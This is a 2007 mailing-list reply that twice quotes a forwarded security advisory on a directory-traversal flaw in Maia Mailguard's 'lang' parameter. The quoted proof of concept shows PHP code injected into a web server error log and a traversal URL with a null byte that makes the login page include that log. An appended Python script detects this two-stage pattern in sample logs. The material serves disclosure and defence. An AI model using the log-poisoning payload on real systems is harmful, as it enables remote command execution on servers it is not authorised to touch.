How does this relate to amavisd?

On Jul 5, 2007, at 4:18 PM, Michael Scheidell wrote:
> didn't see this anywhere, thought you might want to know:
>
> --
> Michael Scheidell, CTO
> SECNAP Network Security Corporation
> Keep up to date with latest information on IT security: Real time
> security alerts: http://www.secnap.com/news
>
> -----Original Message-----
> From: Netragard Security Advisories [mailto:[EMAIL PROTECTED]
> Sent: Thursday, July 05, 2007 11:19 AM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary
> Code Execution][NETRAGARD-20070628]
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> *************************** NETRAGARD ADVISORY ************************
> http://www.netragard.com
> "We make IT Safe"
>
> [Advisory Summary]
> - -----------------------------------------------------------------------
> Advisory Author : Adriel T. Desautels
> Advisory ID : NETRAGARD-20070628
> Product Name : Maia Mailguard
> Product Version : <= 1.0.2 FreeBSD and Possibly More
> Vendor Name : http://www.miamailguard.com
> Type of Vulnerability : Directory Traversal / File Read
> Effort (1-10 where 1 == easy) : 2
> Impact : Arbitrary Code Execution
> Vendor Notified : Yes
> Patch Released : N/A
> Discovery Date : 06/10/2007
>
> [POSTING NOTICE]
> - -----------------------------------------------------------------------
> If you intend to post this advisory on your web-site you must provide a
> clickable link back to http://www.netragard.com as the contents of this
> advisory may be updated without notice.
>
> [Product Description]
> - -----------------------------------------------------------------------
> "Maia Mailguard is a web-based interface and management system based on
> the popular amavisd-new e-mail scanner and SpamAssassin.
> Written in Perl and PHP, Maia Mailguard gives end-users control over how
> their mail is processed by virus scanners and spam filters, while giving
> mail administrators the power to configure site-wide defaults and limits."
>
> - -- http://www.miamailguard.com --
>
> [Technical Summary]
> - -----------------------------------------------------------------------
> A Directory Traversal vulnerability exists in the Maia Mailguard Web
> Application that enables an attacker to execute arbitrary commands on
> the affected system.
>
> [Technical Details]
> - -----------------------------------------------------------------------
> Improper input validation on the "lang" variable in Maia Mailguard web
> application has resulted in a Directory Traversal vulnerability that can
> be used to execute arbitrary commands on the affected system, or, to read
> arbitrary files on the affected system.
>
> [Proof Of Concept]
> - -----------------------------------------------------------------------
> 1-) An attacker can inject code into the httpd-error.log file by
> connecting to port 80 on the affected system and issuing a "get
> <CODE HERE>" command. See example below:
>
> the-wretched:~ simon$ telnet maiatest.snosoft.com 80
> Trying 10.0.0.128...
> Connected to maiatest.snosoft.com.
> Escape character is '^]'.
>
> get <pre>><?php system('ls -laf /var/log');?>
>
> HTTP/1.1 400 Bad Request
> Date: Wed, 20 Jun 2007 21:31:58 GMT
> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> 2-) Once the attacker has injected his code into the log file, the code
> can be executed by forcing the web application to read the log file.
> When the log file is read, the code is executed.
> Below is an example of code execution:
>
> the-wretched:~ simon$ wget
> http://maiatest.snosoft.com/maia/login.php?lang=
> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
>
> [Vendor Status]
> - -----------------------------------------------------------------------
> Vendor has been notified and was quick to resolve the issue.
>
> [Vendor Comments]
> - -----------------------------------------------------------------------
> "The only addition that I had was that it seems to only affect systems
> like freebsd... It would be nice to nail that down. I suspect the
> root security issue is really with the php and file-system
> interaction... my patch just simply works around and blocks the root
> problem. From my developer point of view, I'm asking for one file
> and the file-system is giving us something else. That's a serious risk.
> If we could at least express that concern, I think that would be
> prudent.
>
> Chicken and egg problem, I was kinda waiting on you to post our own
> ticket, but.... I can add a comment afterwards. OK. Here's our ticket
> which also references the changeset:
>
> http://www.maiamailguard.org/maia/ticket/479
>
> A unified patch may be retrieved from:
> http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184
>
> David Morton"
>
> [Disclaimer]
> - ----------------------http://www.netragard.com-------------------------
> Netragard, L.L.C. assumes no liability for the use of the information
> provided in this advisory. This advisory was released in an effort to
> help the I.T. community protect themselves against a potentially
> dangerous security hole. This advisory is not an attempt to solicit
> business.
>
> http://www.netragard.com
>
> *************************** NETRAGARD ADVISORY ************************
> http://www.netragard.com
> "We make IT Safe"
>
> [Advisory Summary]
> -----------------------------------------------------------------------
> Advisory Author : Adriel T. Desautels
> Advisory ID : NETRAGARD-20070628
> Product Name : Maia Mailguard
> Product Version : <= 1.0.2 (All Platforms)
> Vendor Name : http://www.miamailguard.com
> Type of Vulnerability : Directory Traversal / File Read
> Effort (1-10 where 1 == easy) : 2
> Impact : Arbitrary Code Execution
> Vendor Notified : Yes
> Patch Released : N/A
> Discovery Date : 06/10/2007
>
> [POSTING NOTICE]
> -----------------------------------------------------------------------
> If you intend to post this advisory on your web-site you must provide
> a clickable link back to http://www.netragard.com as the contents of
> this advisory may be updated without notice.
>
> [Product Description]
> -----------------------------------------------------------------------
> "Maia Mailguard is a web-based interface and management system based on
> the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl
> and PHP, Maia Mailguard gives end-users control over how their mail is
> processed by virus scanners and spam filters, while giving mail
> administrators the power to configure site-wide defaults and limits."
>
> -- http://www.miamailguard.com --
>
> [Technical Summary]
> -----------------------------------------------------------------------
> A Directory Traversal vulnerability exists in the Maia Mailguard Web
> Application that enables an attacker to execute arbitrary commands on
> the affected system.
>
> [Technical Details]
> -----------------------------------------------------------------------
> Improper input validation on the "lang" variable in Maia Mailguard web
> application has resulted in a Directory Traversal vulnerability that
> can be used to execute arbitrary commands on the affected system, or, to
> read arbitrary files on the affected system.
>
> [Proof Of Concept]
> -----------------------------------------------------------------------
> 1-) An attacker can inject code into the httpd-error.log file by
> connecting to port 80 on the affected system and issuing a "get
> <CODE HERE>" command. See example below:
>
> the-wretched:~ simon$ telnet maiatest.snosoft.com 80
> Trying 10.0.0.128...
> Connected to maiatest.snosoft.com.
> Escape character is '^]'.
>
> get <pre>><?php system('ls -laf /var/log');?>
>
> HTTP/1.1 400 Bad Request
> Date: Wed, 20 Jun 2007 21:31:58 GMT
> Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> 2-) Once the attacker has injected his code into the log file, the code
> can be executed by forcing the web application to read the log file.
> When the log file is read, the code is executed. Below is an example
> of code execution:
>
> the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/
> login.php?lang=
> ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
>
> [Vendor Status]
> -----------------------------------------------------------------------
> Vendor has been notified and has been very quick to respond to and
> patch this issue.
>
> [Vendor Comments]
> -----------------------------------------------------------------------
> "The only addition that I had was that it seems to only affect systems
> like freebsd... It would be nice to nail that down. I suspect the
> root security issue is really with the php and filesystem
> interaction... my patch just simply works around and blocks the root
> problem. From my developer point of view, I'm asking for one file
> and the filesystem is giving us something else. That's a serious
> risk. If we could at least express that concern, I think that would
> be prudent.
>
> Chicken and egg problem, I was kinda waiting on you to post our own
> ticket, but.... I can add a comment afterwards. OK.
> Here's our ticket which also references the changeset:
>
> http://www.maiamailguard.org/maia/ticket/479
>
> A unified patch may be retrieved from:
> http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184
>
> David Morton"
>
> [Disclaimer]
> ----------------------http://www.netragard.com-------------------------
> Netragard, L.L.C. assumes no liability for the use of the information
> provided in this advisory. This advisory was released in an effort to
> help the I.T. community protect themselves against a potentially
> dangerous security hole. This advisory is not an attempt to solicit
> business.
>
> http://www.netragard.com

--
Jo Rhett
Net Consonance : consonant endings by net philanthropy, open source and other randomness
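Added example (not part of the original thread or the Netragard advisory): a log triage check for the two-stage sequence the quoted advisory describes, a malformed request line carrying a script marker, followed by a "lang" value that contains path characters or a NUL byte. The common-log-style line layout, the sample lines, the client addresses and the finding names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache common-log style (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jun/2007:21:30:01 +0000] "GET /maia/login.php?lang=en HTTP/1.1" 200 5120',
    '192.0.2.66 - - [20/Jun/2007:21:31:58 +0000] "get <?php /* constructed marker */ ?>" 400 299',
    '192.0.2.66 - - [20/Jun/2007:21:32:40 +0000] "GET /maia/login.php?lang='
    '../../../var/log/httpd-error.log%00.txt HTTP/1.1" 200 7340',
]

LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<req>[^"]*)" (?P<status>\d{3})')
METHODS = {"GET", "POST", "HEAD", "OPTIONS"}

def classify(request_line):
    """Return the set of findings for one logged request line."""
    findings = set()
    if "<?" in request_line:
        # Stage 1: text that would be copied verbatim into a server log file.
        findings.add("script-marker-in-request-line")
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] not in METHODS:
        findings.add("malformed-request-line")
        return findings
    for key, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        if key != "lang":
            continue
        if "\x00" in value:  # parse_qsl has already decoded %00
            findings.add("nul-byte-in-lang")
        if ".." in value or "/" in value or "\\" in value:
            # Stage 2: the value points outside the language directory.
            findings.add("path-chars-in-lang")
    return findings

def scan(lines):
    """Map client IP -> findings; add a correlation finding when both stages appear."""
    by_ip = {}
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            by_ip.setdefault(m.group("ip"), set()).update(classify(m.group("req")))
    for found in by_ip.values():
        if "script-marker-in-request-line" in found and "path-chars-in-lang" in found:
            found.add("log-injection-then-include")
    return by_ip

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG).items():
        print(ip, sorted(found))
```
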
